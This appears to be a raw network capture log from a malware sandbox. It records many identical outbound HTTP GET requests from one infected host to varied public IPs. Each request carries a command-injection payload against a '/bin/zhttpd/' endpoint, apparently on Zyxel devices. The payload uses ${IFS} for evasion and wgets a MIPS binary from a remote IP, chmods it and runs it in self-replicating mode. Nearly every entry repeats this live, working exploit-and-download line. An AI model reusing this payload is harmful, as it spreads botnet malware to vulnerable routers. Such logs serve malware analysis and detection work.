                                          Jan 14, 2024 15:46:33.378561974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8489192.168.2.2334320168.200.44.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378582954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8490192.168.2.2358656213.54.167.246443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378632069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8491192.168.2.2335122221.188.156.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378635883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8492192.168.2.2345010108.140.102.107443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378655910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8493192.168.2.235686094.199.134.36443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378679991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8494192.168.2.235430484.100.232.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378712893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8495192.168.2.2339434172.78.101.255443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378742933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8496192.168.2.2346892163.91.147.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378767967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8497192.168.2.2349364128.106.82.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378798008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8498192.168.2.2357226187.166.177.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378829002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8499192.168.2.2358976203.66.0.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378849983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8500192.168.2.2348934100.231.39.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378889084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8501192.168.2.2341856173.15.14.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378916979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8502192.168.2.2349034123.119.169.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378948927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8503192.168.2.233569013.36.167.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378972054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8504192.168.2.235258885.75.126.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.378990889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8505192.168.2.235596667.26.8.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379019976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8506192.168.2.2337000190.94.54.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379034996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8507192.168.2.23358964.150.228.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379070997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8508192.168.2.2342132173.89.192.6443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379091978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8509192.168.2.234520849.174.167.4443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379122972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8510192.168.2.23565441.9.69.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379127979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8511192.168.2.234275036.156.54.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379157066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8512192.168.2.2337928139.120.170.191443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379184961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8513192.168.2.2355900170.78.238.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379193068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8514192.168.2.23359024.6.61.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379230976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8515192.168.2.2336354137.105.147.7443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379250050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8516192.168.2.2344418188.204.154.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379291058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8517192.168.2.2344366159.165.200.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379339933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8518192.168.2.235381872.22.6.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379339933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8519192.168.2.2345350142.39.224.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379368067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8520192.168.2.235354090.32.62.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379414082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8521192.168.2.2353072152.195.251.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379434109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8522192.168.2.2353432102.72.162.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379477024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8523192.168.2.2339358152.142.180.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379507065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8524192.168.2.233986043.173.101.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379507065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8525192.168.2.2337684118.12.230.14443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379518032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8526192.168.2.235507047.65.147.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379544020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8527192.168.2.2343180203.86.107.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379570007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8528192.168.2.2360764107.89.79.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379587889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8529192.168.2.2339956218.226.252.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379630089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8530192.168.2.2333812139.197.28.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379648924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8531192.168.2.2351032192.156.48.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379659891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8532192.168.2.2340098213.37.168.205443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379693985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8533192.168.2.2356572172.14.47.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379734039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8534192.168.2.2355586104.192.201.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379761934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8535192.168.2.235665697.244.236.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379797935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8536192.168.2.2337556209.36.202.135443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379829884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8537192.168.2.234270641.74.61.249443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379861116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8538192.168.2.2360460162.6.240.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379861116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8539192.168.2.234545293.104.82.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379909039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8540192.168.2.2346768166.48.52.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379915953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8541192.168.2.234437851.6.189.143443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379956007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8542192.168.2.2344852121.220.39.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379985094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8543192.168.2.234199054.77.251.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.379992008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8544192.168.2.235564879.71.135.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380024910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8545192.168.2.233339652.35.243.12443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380040884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8546192.168.2.235056261.116.218.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380074024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8547192.168.2.235874070.106.101.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380094051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8548192.168.2.2355266174.20.223.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380117893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8549192.168.2.2346004217.118.0.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380155087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8550192.168.2.2349056114.208.64.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:33.380182028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          8551192.168.2.234601688.198.112.217443
                                          TimestampBytes transferredDirectionData
